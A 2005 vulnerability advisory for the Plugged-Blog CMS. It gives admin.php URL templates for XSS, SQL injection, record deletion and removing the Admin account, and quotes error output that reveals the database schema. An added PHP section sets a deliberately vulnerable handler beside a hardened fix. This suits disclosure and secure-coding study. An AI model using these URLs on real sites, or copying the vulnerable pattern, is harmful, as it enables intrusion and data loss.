pluggedBlog.txt

2005-08-05T00:00:00
ID PACKETSTORM:39018
Type packetstorm
Reporter FalconDeOro
Modified 2005-08-05T00:00:00

Description

###############################  
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin  
vendor url: http://www.pluggedout.com  
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html  
vendor notified: yes  
exploit available: yes  
###############################  
  
  
Plugged-Blog is a weblog/portal content management system. The install is  
very easy to use and configure, it is pleasant to use, and it is fast. It  
ships with a Readme and is a good solution for both webmasters and  
ordinary, less technical users.  
  
######### Versions #########  
  
0.4.8  
  
######### Solution #########  
  
No solution at this time!  
  
######### Timeline #########  
  
Discovered: 29-07-2005  
Vendor notified: 29-07-2005  
Disclosure: 30-07-2005  
  
####### Bad Definition ########  
The following variables are not validated before use:  
- userid=  
- contentid=  
- templateid=  
- doctypeid=  
- list_from=  
- usertypeid=  
- templateid=  
- contenttypeid=  
  
http://[victim]/admin.php?action=user_del&userid=[increase-the-current-value]  
  
http://[victim]/admin.php?action=content_del&contentid=[increase-the-current-value]  
  
http://[victim]/admin.php?action=template_edit&templateid=[increase-the-current-value]  
  
http://[victim]/admin.php?action=document_add&doctypeid=[increase-the-current-value]  
  
http://[victim]/admin.php?action=user_list&list_from=[increase-the-current-value]  
  
http://[victim]/admin.php?action=usertype_edit&usertypeid=[increase-the-current-value]  
  
http://[victim]/admin.php?action=template_del&templateid=[increase-the-current-value]  
  
What do you want to remove if there is nothing there? :D  
  
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[increase-the-current-value]  
  
What do you want to remove if there is nothing there? :p  
  
######## How to remove Admin ########  
  
By default, the users Admin and Guest exist. The userid of Admin  
is 2 and the userid of Guest is 1. If you want to remove Admin,  
type in the browser:  
  
http://[victim]/admin.php?action=user_del&userid=2  
  
If you want to remove Guest, type in the browser:  
  
http://[victim]/admin.php?action=user_del&userid=2  
  
Observation: this requires being logged in as the user Admin.  
  
################## Proof of concept ##################  
  
If you write XSS code into a message, it is displayed on the weblog  
home page. A message containing XSS code is also rendered at these URLs:  
  
####### XSS message #######  
  
http://[victim]/admin.php?action=report_statistics&report=visitors  
  
http://[victim]/admin.php?action=content_list  
  
http://[victim]/admin.php?action=report_statistics&report=page_hits  
  
Select the ID to visit (only where that message with the XSS is shown) and the XSS fires.  
  
  
#########  
XSS  
#########  
  
  
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]  
  
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]  
  
  
  
  
###########  
SQL Errors & SQL Injection  
###########  
  
If you write XSS code in the URL:  
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]  
  
or you change the value of contenttypeid=[change-the-value]  
  
you see the error message:  
Problem with SQL  
  
[SELECT nContentSecurityId, cms_ContentSecurity.nUserTypeId,  
cms_ContentSecurity.nContentTypeId, cUserTypeName, cView, cAdd, cEdit, cDelete,  
cApprove FROM cms_ContentSecurity INNER JOIN cms_UserType  
ON cms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId  
WHERE nContentTypeId= ORDER BY cUserTypeName]  
  
And the error for the properties table:  
  
Problem with SQL [SELECT * FROM cms_ContentTypeProperties  
WHERE nContentTypeId= ORDER BY nSortIndex]  
  
So the table and field names are disclosed.  
  
If you write XSS code in the URL above, you see the error message:  
Could not find record [SELECT * FROM cms_Content WHERE  
nContentId=;]  
  
This gives you the name of the table and the affected field.  
  
http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]  
  
And you see this error: SELECT COUNT(nStatisticId) AS  
nCount, MAX(dView) AS dLastView, cSessionId, cIPAddress FROM  
cms_Statistics GROUP BY cSessionId, cIPAddress ORDER BY dLastView DESC  
LIMIT or 1=1,20  
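The errors quoted above come from a handler that drops the raw query parameter straight into its SQL and then echoes the failed statement. Below is an added example, not Plugged-Blog's own code, of that pattern next to a hardened version: the id is validated as a positive integer, bound through a prepared statement, the SQL text is logged instead of shown, and the reflected `s=` search parameter is HTML-escaped on output. Table and column names are the ones from the advisory's error messages; the `$pdo` handle (configured to throw `PDOException`) and the function names are assumptions.

```php
<?php
// Vulnerable pattern (constructed to match the advisory's errors): a missing
// or non-numeric contenttypeid yields "WHERE nContentTypeId= ORDER BY ..."
// and the failing SQL, with table and field names, is sent to the client.
function contenttype_properties_vulnerable(PDO $pdo): array
{
    $id  = $_GET['contenttypeid'] ?? '';
    $sql = "SELECT * FROM cms_ContentTypeProperties WHERE nContentTypeId=$id ORDER BY nSortIndex";
    $res = $pdo->query($sql);                 // interpolated value: SQL injection
    if ($res === false) {
        exit("Problem with SQL [$sql]");      // leaks schema to the attacker
    }
    return $res->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened handler (assumed name): validate, bind, and never echo SQL.
function contenttype_properties_hardened(PDO $pdo): array
{
    // 1. The id must be a positive integer; anything else is a bad request.
    $id = filter_input(INPUT_GET, 'contenttypeid', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        exit('Invalid content type id');
    }
    // 2. Bind the value instead of building the statement with string concatenation.
    $stmt = $pdo->prepare(
        'SELECT * FROM cms_ContentTypeProperties WHERE nContentTypeId = :id ORDER BY nSortIndex'
    );
    try {
        $stmt->execute([':id' => $id]);
    } catch (PDOException $e) {
        // 3. Keep the real error in the server log; the client gets a generic message.
        error_log('cms_ContentTypeProperties lookup failed: ' . $e->getMessage());
        http_response_code(500);
        exit('Internal error');
    }
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 4. Reflected input such as report_statistics&report=visitors&s=... must be
//    escaped before it is placed in HTML, which stops the XSS described above.
function render_search_term(): string
{
    $s = $_GET['s'] ?? '';
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

The same three steps (integer validation, bound parameters, generic error pages) apply to every id parameter listed under "Bad Definition", since each is used the same way.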
  
  
######################## End ##########################  
  
Thanks to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/  
  
  
  
--   
Sincerely:  
FalconDeOro (falcondeoro.blogspot.com)  
Web-Blog: http://falcondeoro.blogspot.com  